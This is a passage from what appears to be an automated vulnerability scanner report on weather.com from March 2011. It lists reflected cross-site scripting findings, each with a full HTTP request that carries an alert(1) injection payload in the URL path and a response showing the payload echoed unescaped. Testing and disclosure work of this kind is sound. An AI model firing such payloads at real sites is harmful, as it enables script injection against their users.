fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:39:00 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x07 X-Varnish: 1096968725 Date: Thu, 24 Mar 2011 17:38:30 GMT Connection: keep-alive Content-Length: 159965 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pageletd0323"><script>alert(1)</script>8da94951a16 /bc/59233" />...[SNIP]...
1.9. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/59233
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe598"-alert(1)-"87ff45b15a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pageletfe598"-alert(1)-"87ff45b15a9 /bc/59233? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/services/desktop.html X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:39:05 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x01 X-Varnish: 624658701 Date: Thu, 24 Mar 2011 17:38:35 GMT Connection: keep-alive Content-Length: 159858 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tch(/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pageletfe598"-alert(1)-"87ff45b15a9 /bc/59233", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011"...[SNIP]...
1.10. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/59233
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15553"-alert(1)-"15f2e7eef1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet/bc15553"-alert(1)-"15f2e7eef1b /59233? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/services/desktop.html X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:43:40 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x05 X-Varnish: 1096972002 Date: Thu, 24 Mar 2011 17:38:40 GMT Connection: keep-alive Content-Length: 108349 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... (/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/bc15553"-alert(1)-"15f2e7eef1b /59233", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.11. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/62264
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc26"-alert(1)-"dee469a1c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pageletcfc26"-alert(1)-"dee469a1c86 /bc/62264?locid=undefined HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:36:41 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x04 X-Varnish: 2366485569 Date: Thu, 24 Mar 2011 17:36:11 GMT Connection: keep-alive Content-Length: 159897 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tch(/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pageletcfc26"-alert(1)-"dee469a1c86 /bc/62264", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011"...[SNIP]...
1.12. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/62264
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de8e4"><script>alert(1)</script>2e617dc8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pageletde8e4"><script>alert(1)</script>2e617dc8ea /bc/62264?locid=undefined HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:36:36 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x03 X-Varnish: 2366483928 Date: Thu, 24 Mar 2011 17:36:06 GMT Connection: keep-alive Content-Length: 159897 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pageletde8e4"><script>alert(1)</script>2e617dc8ea /bc/62264" />...[SNIP]...
1.13. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/62264
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248e6"-alert(1)-"b2076ddb63a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet/bc248e6"-alert(1)-"b2076ddb63a /62264?locid=undefined HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:15 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x05 X-Varnish: 1510843635 Date: Thu, 24 Mar 2011 17:36:15 GMT Connection: keep-alive Content-Length: 108373 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... (/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/bc248e6"-alert(1)-"b2076ddb63a /62264", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.14. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/loc/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ae4"-alert(1)-"d7648350a81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelete3ae4"-alert(1)-"d7648350a81 /loc/?i=0^noId&rnd=1300988008961 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:36:10 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x03 X-Varnish: 1096914746 Date: Thu, 24 Mar 2011 17:35:40 GMT Connection: keep-alive Content-Length: 159842 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tch(/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelete3ae4"-alert(1)-"d7648350a81 /loc/", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.15. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/loc/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d827"><script>alert(1)</script>20ffba2a649 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet9d827"><script>alert(1)</script>20ffba2a649 /loc/?i=0^noId&rnd=1300988008961 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:36:05 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x04 X-Varnish: 1156335400 Date: Thu, 24 Mar 2011 17:35:35 GMT Connection: keep-alive Content-Length: 159920 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet9d827"><script>alert(1)</script>20ffba2a649 /loc/" />...[SNIP]...
1.16. http://www.weather.com/pagelet/loc/ [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/loc/
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34e99"-alert(1)-"7e7a13b6793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet/loc34e99"-alert(1)-"7e7a13b6793 /?i=0^noId&rnd=1300988008961 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:40:46 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x05 X-Varnish: 1096916647 Date: Thu, 24 Mar 2011 17:35:46 GMT Connection: keep-alive Content-Length: 108345 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... /beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/loc34e99"-alert(1)-"7e7a13b6793 /", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.17. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/metrics/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6673d"><script>alert(1)</script>bb9577b79b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet6673d"><script>alert(1)</script>bb9577b79b5 /metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:19 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x00 X-Varnish: 1156434678 Date: Thu, 24 Mar 2011 17:40:49 GMT Connection: keep-alive Content-Length: 159999 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet6673d"><script>alert(1)</script>bb9577b79b5 /metrics/" />...[SNIP]...
1.18. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/metrics/
Issue detail
